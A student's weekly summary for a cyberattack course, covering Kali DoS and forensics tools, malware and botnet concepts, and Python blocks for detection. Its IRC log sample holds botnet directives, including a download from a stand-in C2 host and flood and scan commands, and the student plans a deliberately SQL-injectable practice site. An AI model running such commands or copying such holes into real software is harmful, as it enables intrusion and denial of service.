20159302 "Cyber Attack and Prevention" Ninth Week Study Summary


I. Video learning content

1. Stress testing

Stress testing finds the maximum service level a system can provide by locating its bottleneck, that is, the point at which its performance is no longer acceptable. In plain terms, stress testing tells you under what conditions your application's performance becomes unacceptable.

Kali's stress testing tools fall into four categories: VoIP stress testing, web stress testing, network stress testing and wireless stress testing.

1.1 VoIP stress testing tools: mainly iaxflood and inviteflood.

1.2 Web stress testing: thc-ssl-dos. With the thc-ssl-dos attack tool, anyone can take a website that offers SSL connections offline; the method is called an SSL denial of service attack (SSL DoS). The German hacker group "The Hacker's Choice" released thc-ssl-dos; it uses a known weakness in SSL to exhaust server resources rapidly, and unlike traditional DDoS tools it needs no bandwidth to speak of and only a single computer carrying out a single attack.

The weakness lies in the protocol's renegotiation process; renegotiation is used for browser-to-server authentication.

1.3 Network stress testing: dhcpig exhausts the DHCP address pool.

1.4 IPv6 attack toolkit.

1.5 inundator: an IDS/IPS/WAF stress testing tool.

1.6 macof: performs MAC flooding attacks.

1.7 siege: a stress testing and benchmarking tool for web developers, used to evaluate how well an application holds up under load. Following its configuration it makes many concurrent requests to a website, records the response time of each user's requests, and repeats this for a given number of concurrent users.

1.8 T50 stress testing: T50 Sukhoi PAK FA Mixed Packet Injector (formerly F22 Raptor) is a powerful stress testing tool with a unique packet injection capability. T50 supports multi-protocol packet injection on *nix systems; in fact it supports 15 protocols.

1.9 Wireless stress testing: includes mdk3 and reaver.

2. Digital Forensics Tools

Digital forensics applies computer investigation and analysis techniques to identifying and collecting electronic evidence that can have legal force; it is aimed at hackers and intrusions, with the goal of safeguarding network security. Kali includes a rich set of digital forensics tools.

2.1 peepdf is a PDF analysis tool written in Python that detects malicious PDF files. It is designed to give security researchers every component they might need for PDF analysis in one place, instead of using several separate tools for the same task.
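To show the kind of first-pass triage a tool like peepdf performs, here is an added example (our own code, not peepdf's) that counts the PDF name objects most often tied to malicious behaviour. It also undoes the #xx hex escapes that PDF allows inside names, because a name written as /J#61vaScript is still /JavaScript to the reader but would slip past a naive string search. The sample PDF and the list of names treated as suspicious are our own assumptions.

```python
import re

# Name objects that PDF triage tools such as peepdf and pdfid count. The names are
# standard PDF keywords; which ones to treat as suspicious is our own choice.
SUSPICIOUS_NAMES = (
    "/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
    "/EmbeddedFile", "/RichMedia", "/ObjStm", "/XFA", "/URI",
)

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes inside name objects, so that /J#61vaScript is counted as /JavaScript."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count suspicious names, objects and streams in a raw PDF (no parsing of the object tree)."""
    norm = normalize_names(data)
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # A name ends at the first non-regular character, so /JS must not match inside /JSomething.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9_])"
        counts[name] = len(re.findall(pattern, norm))
    counts["objects"] = len(re.findall(rb"\d+\s+\d+\s+obj\b", norm))
    counts["streams"] = len(re.findall(rb"\bstream\b", norm))
    return counts


def risk_flags(counts: dict) -> list:
    """Translate the raw counts into the observations an analyst would note first."""
    flags = []
    if counts["/JavaScript"] or counts["/JS"]:
        flags.append("contains JavaScript")
    if counts["/OpenAction"] or counts["/AA"]:
        flags.append("runs an action automatically on open")
    if counts["/Launch"]:
        flags.append("may launch an external program")
    if counts["/EmbeddedFile"]:
        flags.append("carries an embedded file")
    return flags


# Constructed sample: a minimal PDF whose catalog triggers an obfuscated JavaScript action.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    result = scan_pdf(SAMPLE_PDF)
    print(result)
    print(risk_flags(result))
```

A keyword count is only a triage signal: compressed object streams (/ObjStm) and encrypted documents hide names from this scan, which is why a full analyser such as peepdf also decodes streams and walks the object tree.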

2.2 Anti-forensics detection: chkrootkit is a tool for finding and detecting rootkit backdoors on Linux systems; it determines whether a rootkit has been planted on the system.

2.3 Memory forensics tool: Volatility is an open-source memory forensics tool for Windows, Linux, Mac and Android. It is written in Python, operated from the command line, and supports a range of operating systems.

2.4 Forensic carving tool: binwalk. Binwalk is a firmware analysis tool designed to help researchers analyse, extract and reverse engineer firmware images. It is easy to use, fully scriptable, and easily extended with custom signatures, extraction rules and plugin modules. One of binwalk's most powerful features is the ability to find and extract files hidden inside other files (such as archives) and to parse their formats.
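Binwalk's core idea is a signature scan: walk the image, note every offset where a known file magic appears, then carve from that offset. The following is an added example (our own code, not binwalk's) that does this for a handful of magics and shows why carving needs format knowledge rather than a fixed length: the gzip member's end is found by letting zlib decompress it and reporting what bytes remain, and the zip entry's end is computed from its local file header. The sample image built by build_sample_firmware and the signature table are our own constructions.

```python
import gzip
import io
import re
import struct
import zipfile
import zlib

# Magic-byte signatures (a tiny subset of what binwalk knows; the values are the
# standard file magics, the selection is ours).
SIGNATURES = {
    b"\x7fELF": "ELF executable",
    b"\x1f\x8b\x08": "gzip compressed data",
    b"PK\x03\x04": "Zip archive (local file header)",
    b"hsqs": "SquashFS filesystem (little endian)",
}


def scan_signatures(blob: bytes) -> list:
    """Return (offset, description) for every signature hit, sorted by offset."""
    hits = []
    for magic, desc in SIGNATURES.items():
        for m in re.finditer(re.escape(magic), blob):
            hits.append((m.start(), desc))
    return sorted(hits)


def zip_entry_length(blob: bytes, off: int) -> int:
    """Length of one zip local entry at off: 30-byte header + name + extra + compressed data."""
    # sig(4) ver(2) flag(2) method(2) time(2) date(2) crc(4) csize(4) usize(4) nlen(2) xlen(2)
    fields = struct.unpack_from("<4sHHHHHIIIHH", blob, off)
    csize, nlen, xlen = fields[7], fields[9], fields[10]
    return 30 + nlen + xlen + csize


def carve(blob: bytes, off: int, desc: str) -> dict:
    """Carve the object starting at off; returns its start, end and payload."""
    if desc.startswith("gzip"):
        # wbits 16+MAX_WBITS selects the gzip wrapper; inflate stops after the gzip
        # trailer, and whatever it did not consume is the rest of the image.
        d = zlib.decompressobj(16 + zlib.MAX_WBITS)
        payload = d.decompress(blob[off:])
        end = len(blob) - len(d.unused_data)
        return {"start": off, "end": end, "payload": payload}
    if desc.startswith("Zip"):
        end = off + zip_entry_length(blob, off)
        return {"start": off, "end": end, "payload": blob[off:end]}
    # No length information in the header we parse: hand back everything from the offset.
    return {"start": off, "end": len(blob), "payload": blob[off:]}


def build_sample_firmware() -> bytes:
    """Constructed sample image: padding, a fake ELF header, a gzip member, a zip archive."""
    gz = gzip.compress(b"console=ttyS0 root=/dev/mtdblock2", mtime=0)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:           # ZIP_STORED, sizes written in the local header
        zf.writestr("www/index.html", b"<html>hello</html>")
    return (b"\xff" * 64 + b"\x7fELF" + b"\x00" * 60
            + gz + b"\xff" * 32 + buf.getvalue() + b"\xff" * 16)


if __name__ == "__main__":
    fw = build_sample_firmware()
    for off, desc in scan_signatures(fw):
        c = carve(fw, off, desc)
        print(f"{off:#08x}  {desc}  ({c['end'] - c['start']} bytes)")
```

Note that a magic match alone is not proof: four bytes such as "hsqs" can occur by chance inside compressed data, which is why binwalk validates the header fields behind a hit before reporting it, and why carve here trusts the format's own length fields rather than the next signature.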

2.5 Forensic hash verification toolset: md5deep is a cross-platform program that computes and compares MD5, SHA-1, SHA-256, Tiger and Whirlpool message digests of files.
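The forensic use of md5deep is less about computing a digest than about comparing it against a list: known-good hashes to exclude unchanged system files, or known-bad hashes to locate malware. This added example (our own code, not md5deep's) reads a file once while feeding every chunk to several algorithms, parses a "digest  path" hash list in the format md5deep itself writes, and reports either the files that match the list or the files that do not, mirroring md5deep's -m and -x modes. The sample files and the hash list are constructed in the block; a real baseline comes from a trusted source such as a vendor manifest or a pre-incident snapshot.

```python
import hashlib
import io

ALGORITHMS = ("md5", "sha1", "sha256")


def digest_stream(stream, algorithms=ALGORITHMS, chunk_size=65536):
    """Hash a file-like object in one pass, feeding every chunk to all requested algorithms."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def load_hash_list(text):
    """Parse 'digest  path' lines (the md5deep/sha256deep output format) into {digest: path}."""
    known = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, path = line.partition("  ")
        known[digest.lower()] = path.strip()
    return known


def audit(files, known, mode="match"):
    """mode='match': files whose digest is in the set (like md5deep -m);
    mode='negative': files whose digest is NOT in the set (like md5deep -x)."""
    report = []
    for name, data in files.items():
        digests = digest_stream(io.BytesIO(data))
        hit = next((d for d in digests.values() if d in known), None)
        if (mode == "match") == (hit is not None):
            report.append((name, hit))
    return report


# Constructed sample data. The hash list is derived from the sample contents only so
# that the example is self-contained; in practice it must come from a trusted source.
SAMPLE_FILES = {
    "bin/ls": b"known good binary",
    "opt/tool": b"legacy tool",
    "tmp/.x": b"unknown payload",
}
KNOWN_GOOD_SHA256 = hashlib.sha256(SAMPLE_FILES["bin/ls"]).hexdigest()
KNOWN_GOOD_MD5 = hashlib.md5(SAMPLE_FILES["opt/tool"]).hexdigest()
SAMPLE_HASH_LIST = f"""# constructed baseline, one digest per line
{KNOWN_GOOD_SHA256}  /usr/bin/ls
{KNOWN_GOOD_MD5}  /opt/tool
"""

if __name__ == "__main__":
    known = load_hash_list(SAMPLE_HASH_LIST)
    print("in baseline:", audit(SAMPLE_FILES, known, "match"))
    print("not in baseline:", audit(SAMPLE_FILES, known, "negative"))
```

Mixing algorithms in one list works because the lookup is by digest string; the weakness of MD5 against chosen-prefix collisions is the reason modern baselines record SHA-256 alongside it.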

2.6 Forensic image toolset: tools for disk image files, such as mmstat and mmls.

2.7 Digital forensics suites: DFF (Digital Forensics Framework) is a simple but powerful tool for digital forensics work. It has a flexible modular system with many functions, including recovering files lost through errors or crashes, evidence searching and analysis, and so on. DFF provides a strong architecture and a number of useful modules. Autopsy, by contrast, provides a browser-based console.

3. Reporting tools and system services

A complete penetration test ends with a polished report as its summary, so Kali provides security engineers with a corresponding set of reporting tools.

3.1 Dradis: an information-sharing framework (collaboration platform) for improving the efficiency of security testing. Dradis provides a central repository of information in which we record the work already done and the next steps.

3.2 KeepNote: rich text formatting (coloured fonts, inline images, hyperlinks, so a whole web page with its images and text can be saved); tree-structured hierarchical organisation of notes; full-text search; integrated screenshots; file attachments; integrated backup and restore; spell checking (via GtkSpell); auto-save; built-in backup and restore (ZIP archives).

3.3 CutyCapt: media capture.

3.4 MagicTree is a penetration tester's tool that helps you easily and directly merge data, run queries, execute external commands and generate reports; all data is stored in a tree structure, which is very convenient.

3.5 TrueCrypt: free, open-source encryption software that supports a variety of operating systems.

3.6 System services:

beef: starts and stops the XSS testing framework BeEF;

dradis: starts and stops the note-sharing service Dradis;

http: starts and stops Kali's local web service;

metasploit: starts and stops the Metasploit service.

II. Textbook content

1. Malicious code

Malicious code is a set of instructions that makes a computer carry out a malicious goal according to the attacker's intent. First, malicious code is a set of instructions, and it can be realised in many forms: binary executables, script code, macro code, or a stream of instructions living parasitically inside other code or in a boot sector. Second, what the code does is decided by its author, to satisfy some psychological or financial need. Typical attack goals include, but are not limited to: showing off technical skill or pranking; remote control of the compromised host, turning it into the attacker's puppet for use as a springboard for further attacks or for spreading more malicious code; stealing private or confidential information; stealing computing, storage and bandwidth resources; denial of service; and destruction.

Malicious code can be divided into computer viruses, worms, malicious mobile code, Trojan horses, backdoors, zombie (bot) programs, kernel suites (rootkits) and so on, according to how it executes, how it propagates, and the effect it has on the attack target. The computer virus is the earliest type of malicious code.

Computer virus: self-replicating code that infects other programs by embedding itself in them; the infection process usually needs human intervention to complete.

Worm: a class of self-running malicious code that does not need to embed itself in other host programs.

Malicious mobile code: belongs to the category of mobile code; mobile code is a lightweight program that can be downloaded from a remote host and executed locally.

Backdoor: a class of malicious code that bypasses the normal security control mechanisms and so gives the attacker an access channel.

Trojan horse: a class of malicious code disguised as useful software that hides its malicious purpose.

Botnet: a network of attack hosts built by an attacker who, for malicious purposes, spreads bot programs to infect a large number of hosts, which are then directed through a one-to-many command and control channel.

Zombie (bot) program: the form of malicious code used to build a botnet, forming a one-to-many controlled attack platform.

Kernel suite (rootkit): a class of malicious code that obtains and keeps the highest level of control, either in user mode by replacing or modifying key system executables, or in kernel mode by taking control of the operating system kernel; it is divided into user-mode rootkits and kernel-mode rootkits.

Naming and classification: the anti-virus industry generally uses the "ternary naming" rule for newly discovered malicious code samples, where "ternary" refers to the malicious code type, the family name and the variant number. The general form is: [Malicious code type.] Malicious code family name [Variant].

Development trends: ① the complexity and destructive power of malicious code keep increasing; ② malicious code techniques are being renewed more and more frequently; ③ the focus is shifting from computer viruses to worms and kernel-level attack tools.

2. Computer viruses

The concept of the computer virus was first proposed by Fred Cohen in 1983. Our country has a legally binding definition of the computer virus: a computer virus is a set of computer instructions or program code, inserted into a computer program, that damages computer functions or data, affects the use of the computer, and can replicate itself.

Characteristics of computer viruses: infectiousness, latency, triggerability, destructiveness, derivability.

Infection and boot mechanism of computer viruses: a computer virus needs to embed itself in a host program to run, and the way it infects the host program determines how the virus is booted from that host program, so the infection and boot mechanisms are closely related. The potential infection targets of a computer virus are executable files (with three ways of infecting them: the prepending mechanism, the appending mechanism and the insertion mechanism), boot sectors, and data files that support macro instructions.

Transmission mechanisms of computer viruses: removable storage, e-mail and downloads, shared directories, and so on.

3. Network Worms

A network worm is malicious code that propagates autonomously over the network. By definition, a worm is self-replicating code that spreads through the network, usually without human intervention. It is precisely this rapid, active propagation that lets a worm paralyse the whole Internet, which is why worms are called the "plague of the Internet age". The Morris worm of November 1988 is regarded as the "first Internet worm" because of its reach and impact. The SQL Slammer worm is the fastest-spreading network worm in history.

Key feature: autonomous propagation over the network. If a piece of code does not spread over the network, it is not a worm.

Worm composition: the internal components of a worm resemble the parts of a missile. The warhead is used to penetrate the target; the propagation engine, like the missile's motor, carries the worm to its target; the target selection algorithm and scanning engine act much like the small gyroscope in a missile, guiding it to find and point at its target; and the payload compartment carries the harmful material that performs the actual destructive attack.

The most common techniques for gaining access to a target system: buffer overflow attacks, file-sharing attacks, e-mail propagation, and other common misconfigurations.

Propagation engine: commonly used network transport mechanisms include the File Transfer Protocol (FTP), the Trivial File Transfer Protocol (TFTP), the Hypertext Transfer Protocol (HTTP), the Server Message Block protocol (SMB), and raw sockets.

4. Backdoor and Trojan

By definition, a backdoor is a program that lets an attacker bypass the system's normal security control mechanisms and obtain an access channel in the way the attacker intends; a Trojan horse is a program that appears to have some useful or benign purpose but in fact hides malicious functionality.

Access channels of backdoor tools: (1) local privilege escalation and local accounts, (2) remote execution of a single command, (3) remote command-line interpreter access, (4) remote GUI control, (5) portless backdoors. Backdoor tools often exploit the system's autostart functions, adding themselves to what the system runs after a restart. On Windows, a backdoor can use three main autostart mechanisms: the startup folder, registry autorun keys, and scheduled tasks.

The name "Trojan horse" comes from the Trojan War described in Homer's epic. Trojan horse programs serve the following purposes: (1) deceiving the user or system administrator into installing the Trojan, so that it enters the computer system through an unsuspecting user; (2) hiding among the computer's normal programs, disguised as something that belongs to the system, so that users and administrators are unaware of it; usually combined with a backdoor tool, making it a Trojan backdoor. Common naming camouflage techniques are confusing file extensions and mimicking the names of Windows system files or services. Attacking a software distribution site lets attackers trojanise the software on the official site, so that everyone who downloads it installs a malicious version, threatening tens of thousands or even millions of users. Code poisoning refers to a vendor's developers or testers implanting program logic unrelated to the software, or even malicious code, during development and testing.
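The two passages above describe where a backdoor hides (Windows autostart locations) and how a Trojan hides its name (confusing extensions, imitating system file names). As an added example, not code from the page, the following Python audits a registry Run key export for exactly those signs: it parses the .reg text, takes the program path from each command line, and flags double extensions such as invoice.pdf.exe, system process names running from outside System32, look-alike names such as svch0st.exe, and programs started from user-writable directories. The .reg sample, the list of imitated system binaries, the trusted directories and the 0.85 similarity threshold are all our own assumptions.

```python
import re
from difflib import SequenceMatcher

# Windows system process names that malware commonly imitates (selection is ours).
SYSTEM_BINARIES = ("svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe", "services.exe")
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows", r"c:\program files", r"c:\program files (x86)")
EXECUTABLE_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}

_REG_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_run_key(text):
    """Parse a .reg export of a Run key into {value name: command line}, unescaping backslashes and quotes."""
    entries = {}
    for line in text.splitlines():
        m = _REG_VALUE.match(line.strip())
        if m:
            entries[m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    return entries


def executable_path(command):
    """The program part of a command line; a quoted path keeps its spaces."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ")[0]


def camouflage_findings(path):
    """Heuristics for the naming tricks described above; returns a list of finding strings."""
    findings = []
    lower = path.lower()
    name = lower.rsplit("\\", 1)[-1]
    parts = name.split(".")
    if len(parts) >= 3 and "." + parts[-1] in EXECUTABLE_EXT and "." + parts[-2] in DOCUMENT_EXT:
        findings.append("double extension hides executable")
    if name in SYSTEM_BINARIES:
        if not lower.startswith("c:\\windows\\system32\\"):
            findings.append("system binary name outside System32")
    else:
        for sysname in SYSTEM_BINARIES:   # svch0st.exe, scvhost.exe and similar look-alikes
            if SequenceMatcher(None, name, sysname).ratio() >= 0.85:
                findings.append(f"name resembles {sysname}")
                break
    if not any(lower.startswith(d + "\\") for d in TRUSTED_DIRS):
        findings.append("runs from untrusted directory")
    return findings


def audit_run_key(reg_text):
    """Map each autorun value name to its findings, omitting entries that look clean."""
    report = {}
    for value_name, command in parse_reg_run_key(reg_text).items():
        findings = camouflage_findings(executable_path(command))
        if findings:
            report[value_name] = findings
    return report


# Constructed sample export of HKCU\...\Run with one legitimate and two suspicious entries.
SAMPLE_RUN_KEY = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"Windows Update"="C:\\Users\\alice\\AppData\\Roaming\\svch0st.exe"
"Invoice"="C:\\Users\\alice\\Downloads\\invoice.pdf.exe"
'''

if __name__ == "__main__":
    for value_name, findings in audit_run_key(SAMPLE_RUN_KEY).items():
        print(f"{value_name}: {', '.join(findings)}")
```

The same checks apply unchanged to startup-folder shortcuts and scheduled-task actions once their target paths are extracted; the value of the heuristic is in the path check, since a real svchost.exe never starts from a user's profile directory.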

5. Botnets

A botnet is a new form of attack that builds on traditional malicious code such as network worms, Trojan horses and backdoor tools. A botnet is a network of attack hosts formed when an attacker, for malicious purposes, spreads bot programs to infect a large number of hosts and directs them through one-to-many command and control channels. The basic feature that distinguishes botnets from other attacks is the use of a one-to-many command and control mechanism, together with the malicious, network-based propagation of the bots.

Structure of a botnet: the earliest IRC botnets consist of a botnet controller and bot programs. A bot's functional structure divides into main function modules and auxiliary function modules. The main function modules are the command and control module, which realises the defining characteristic of a botnet, and the propagation module, which realises its network propagation characteristic; the auxiliary function modules (information stealing, host control, download and update, and anti-analysis and anti-detection) give the bot stronger attack capabilities and better survivability. The command and control module within the main function modules is the core of the whole bot program. By propagation strategy, bots fall into two classes, automatically propagating bots and bots that propagate under control, and the ways bots spread include exploiting remote software vulnerabilities, scanning for weak NetBIOS passwords, scanning for backdoors left behind by other malicious code, sending mail viruses, spreading through shared file systems, and so on. The auxiliary function modules are the sum of the other functions beyond the main ones: information stealing, bot host control, download and update, and evading detection and resisting analysis.

Bot control and commands: the basic feature of a botnet is its one-to-many command and control mechanism, so understanding how command and control is implemented is an essential prerequisite for a deeper understanding of botnets. The mainstream command and control mechanisms today are based on the IRC protocol, on the HTTP protocol, and on peer-to-peer protocols. One of the most common ways of communicating on IRC networks is group chat. On top of IRC, an attacker has three ways to issue commands to the controlled bots: setting the channel topic, sending a PRIVMSG message to the channel or to a single bot, and sending commands in NOTICE messages. The commands sent in an IRC botnet can be grouped, according to the bot's function modules, into botnet control commands, propagation commands, information stealing commands, host control commands, and download and update commands; host control commands can be broken down further into launching DDoS attacks, setting up services, sending spam, click fraud, and more. Building the command and control mechanism on HTTP has two advantages: first, an HTTP control channel lets botnet control traffic disappear into the huge volume of ordinary web traffic, making HTTP-based botnet activity harder to detect; second, an HTTP control channel generally passes through firewalls. Both IRC-based and HTTP-based command and control have a central control point, which makes these client-server botnets comparatively easy to track, detect and take over.
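The three IRC delivery methods named above (channel topic, PRIVMSG, NOTICE) are what a network monitor watching a suspected IRC control channel keys on. The following added example (our own code, not from the page or any real bot or detector) parses raw IRC protocol lines into prefix, command, parameters and trailing text, treats the topic (both a TOPIC command and the 332 RPL_TOPIC reply), PRIVMSG and NOTICE as the three delivery paths, and sorts any directive it finds into the five command categories the text lists. The sample traffic, the "." and "!" directive sigils and the keyword-to-category table are all constructed assumptions; real bots use their own syntax, so in practice the table is filled from samples seen in the environment.

```python
from collections import namedtuple

IrcMessage = namedtuple("IrcMessage", "prefix command params trailing")


def parse_irc(line):
    """Split one IRC line: [':' prefix ' '] command params... [' :' trailing]."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    rest, sep, trailing = line.partition(" :")
    if not sep:
        trailing = None
    words = rest.split()
    return IrcMessage(prefix, words[0].upper(), words[1:], trailing)


DIRECTIVE_SIGILS = (".", "!")       # assumption: bot commands start with a sigil
CATEGORIES = {                      # the page's five classes; the verbs are constructed
    "botnet control": ("login", "logout", "join", "part", "quit", "reconnect"),
    "propagation": ("scan", "spread", "exploit"),
    "information stealing": ("keylog", "getinfo", "sysinfo", "steal"),
    "host control": ("flood", "ddos", "spam", "click", "cmd", "execute"),
    "download and update": ("download", "update"),
}


def classify(directive):
    """Map the first word of a directive to one of the command categories."""
    words = directive.lstrip("".join(DIRECTIVE_SIGILS)).split()
    verb = words[0].lower() if words else ""
    for category, verbs in CATEGORIES.items():
        if any(verb == v or verb.startswith(v) for v in verbs):
            return category
    return "unknown"


def extract_directives(lines):
    """Return (target, delivery, directive, category) for every directive seen in the traffic."""
    found = []
    for line in lines:
        if not line.strip():
            continue
        msg = parse_irc(line)
        if msg.trailing is None:
            continue
        if msg.command == "TOPIC" and msg.params:
            delivery, target = "topic", msg.params[0]
        elif msg.command == "332" and len(msg.params) >= 2:     # RPL_TOPIC: <nick> <channel> :<topic>
            delivery, target = "topic", msg.params[1]
        elif msg.command in ("PRIVMSG", "NOTICE") and msg.params:
            delivery, target = msg.command.lower(), msg.params[0]
        else:
            continue
        if msg.trailing.startswith(DIRECTIVE_SIGILS):
            found.append((target, delivery, msg.trailing, classify(msg.trailing)))
    return found


# Constructed sample of server-to-client traffic on a suspected control channel.
SAMPLE_LOG = [
    ":c2.example.invalid 332 bot7 #ops :.update http://c2.example.invalid/new.bin",
    ":boss!b@h TOPIC #ops :.scan 10.0.0.0/8 445",
    ":boss!b@h PRIVMSG #ops :.flood 203.0.113.5 80 120",
    ":boss!b@h NOTICE bot7 :!sysinfo",
    ":alice!a@h PRIVMSG #ops :hello, anyone around?",
    "PING :c2.example.invalid",
]

if __name__ == "__main__":
    for target, delivery, directive, category in extract_directives(SAMPLE_LOG):
        print(f"{delivery:8} {target:6} {category:22} {directive}")
```

A topic-delivered command is the one to watch most closely: every bot that joins the channel receives it on entry, so a single 332 reply is often the first evidence of the botnet's current task.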

A rootkit is defined as a type of Trojan backdoor tool that gives the attacker access and hides that access from the computer's users by modifying existing operating system software. A rootkit is made up of many functional components: malicious programs that replace operating system software in order to hide themselves, a backdoor that provides hidden backdoor access, and a variety of helper tools that let the attacker adjust the characteristics of the replaced programs. Because a rootkit is usually a toolkit of malicious programs, it is named "root" + "kit", the kit used to obtain root-level backdoor access. Following the layering of the operating system, rootkits run at two different levels: user mode and kernel mode. A user-mode rootkit typically contains binary replacements that provide backdoor access, binary replacements that hide the attacker, binaries used for hiding that do not replace anything, a few other scattered tools, and an installation script. Windows provides a number of development interfaces that let third-party tools extend its built-in features, and it uses the WFP (Windows File Protection) mechanism to prevent critical operating system files from being modified or replaced. A user-mode rootkit can also use DLL injection and API hooking to place malicious code directly into a running program's memory space.

III. Study progress

I can keep up with the pace of the course and have grasped the basic stress testing, digital forensics and report generation methods; in this part of the study I mastered some system stress testing, computer forensics and system reporting tools and similar system application tools. My weakness is hands-on work: there were many snags during the experiments, but all of them were solved in the end.

Problem encountered in this week's study: I tried to use PHP to build a website on WampServer and got normal registration and login working, but I have not yet managed to set up a SQL injection vulnerability and do not know how exactly the vulnerability is exploited.

IV. Learning goals for the semester

Learn and master the PHP language and use it to build a website that applies the knowledge learned in network attack, setting up SQL injection and XSS vulnerabilities, so as to practise the course content from both sides.

V. Study plan for next week

Optimise the website, design its pages and other functions, and use it to build SQL injection vulnerabilities.
